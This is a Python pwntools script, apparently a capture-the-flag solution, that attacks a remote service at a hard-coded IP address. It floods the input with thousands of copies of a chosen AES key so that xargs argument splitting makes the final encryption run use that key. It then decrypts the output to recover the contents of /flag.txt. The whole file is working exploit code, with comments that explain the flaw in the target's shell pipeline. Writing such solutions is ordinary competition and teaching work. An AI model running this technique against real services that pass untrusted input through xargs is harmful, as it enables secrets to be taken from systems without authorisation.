from pwn import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import time

def solve():
    # Connection details
    host = '34.86.4.154'
    port = 5000

    # The key we will force enc.py to use
    forced_key_hex = "AA" * 16 
    forced_key_bytes = bytes.fromhex(forced_key_hex)

    payload_val = forced_key_hex 
    
    # Reverting to safer number to avoid OOM.
    # 20k produced output before. Let's try 22k.
    total_args = 22000 
    
    # Chunking: Send args in lines to avoid read buffer limits and bash loop slowness.
    # 4KB per line is safe.
    
    r = remote(host, port)
    
    print(f"[*] Constructing payload with {total_args} keys...")
    
    # Build a single line with many keys
    full_payload = []
    
    # Size optimization: 
    # key="AA"*16 + " "
    # chunk_size ~ 4096
    
    keys_per_line = 100 # 3300 bytes + overhead
    
    lines_needed = total_args // keys_per_line
    remainder = total_args % keys_per_line
    
    line_payload = (forced_key_hex + " ") * keys_per_line
    
    # We will send repeatedly.
    # r.sendline(line_payload) * lines_needed
    
    print(f"[*] Sending {lines_needed} lines of {keys_per_line} keys each...")
    
    for i in range(lines_needed):
        r.sendline(line_payload.encode())
        if i % 100 == 0:
            print(f"Sent {i}/{lines_needed} lines")
            
    if remainder > 0:
        r.sendline(((forced_key_hex + " ") * remainder).encode())
        
    r.sendline(b"EOF")

    print("[*] Payload sent. Receiving response...")
    
    response = r.recvall(timeout=30)
    
    # Response will contain outputs from multiple executions.
    # We are interested in the last one, which hopefully contains the flag encrypted with our key.
    # The output format is hex(iv) + hex(ct).
    
    lines = response.strip().split(b'\n')
    
    # Identifying the correct line:
    # Most lines will be just encryptions of our 00...00 strings using the random keys generated by xargs splits or initial run.
    # The LAST execution should have the flag as the last argument.
    # Wait, the flag is appended to the file.
    # run.sh: cat /flag.txt >> "$OUTFILE"
    # So the flag is effectively the LAST argument in the input file.
    # When xargs splits, it preserves order.
    # So the flag will be in the arguments of the very last execution of enc.py.
    # And because we flooded it with our keys, the FIRST argument of that last execution (which becomes the key) should be one of our payload values.
    
    # So we want the output of the last execution.
    # With `enc.py`, it prints `iv.hex() + ct.hex()`.
    
    valid_flags = []
    
    for line in reversed(lines):
        line = line.strip()
        if len(line) < 32: continue # too short to be IV+CT
        
        try:
            line_str = line.decode()
            blob = bytes.fromhex(line_str)
            iv = blob[:16]
            ct = blob[16:]
            
            cipher = AES.new(forced_key_bytes, AES.MODE_CBC, iv)
            try:
                # Try decrypting without unpad first to see what we get
                decrypted_raw = cipher.decrypt(ct)
                print(f"[?] Decrypted raw start: {decrypted_raw[:64]}")
                print(f"[?] Decrypted raw end: {decrypted_raw[-64:]}")
                
                if b'CTF' in decrypted_raw or b'flag' in decrypted_raw:
                     print("[!] FOUND FLAG PATTERN!")
                     try:
                         pt = unpad(decrypted_raw, AES.block_size)
                         valid_flags.append(pt)
                         break
                     except:
                         valid_flags.append(decrypted_raw) # Append raw if unpad fails
                         break
            except Exception as e:
                print(f"[-] Decryption error: {e}")
        except Exception:
            pass
            
    print(f"[*] Found {len(valid_flags)} potential flag candidates.")
    
    # Check ALL lines
    for i, line in enumerate(lines):
        line = line.strip()
        if len(line) < 32: continue
        try:
            line_str = line.decode()
            blob = bytes.fromhex(line_str)
            iv = blob[:16]
            ct = blob[16:]
            cipher = AES.new(forced_key_bytes, AES.MODE_CBC, iv)
            dec = cipher.decrypt(ct)
            
            # Check for flag
            if b'CTF' in dec or b'flag' in dec:
                print(f"[!] FLAG FOUND in line {i}: {dec[-100:]}")
                valid_flags.append(dec)
            elif all(32 <= c <= 126 for c in dec[:10]): # Looks like ASCII?
                 print(f"[?] ASCII-like line {i}: {dec[:50]}")
            
            # Print last bits anyway
            # print(f"Line {i} end: {dec[-20:]}")
        except Exception as e:
            pass
            
    if not valid_flags:
        print("[-] No flag candidates found automatically. Check debug output.")

if __name__ == '__main__':
    solve()
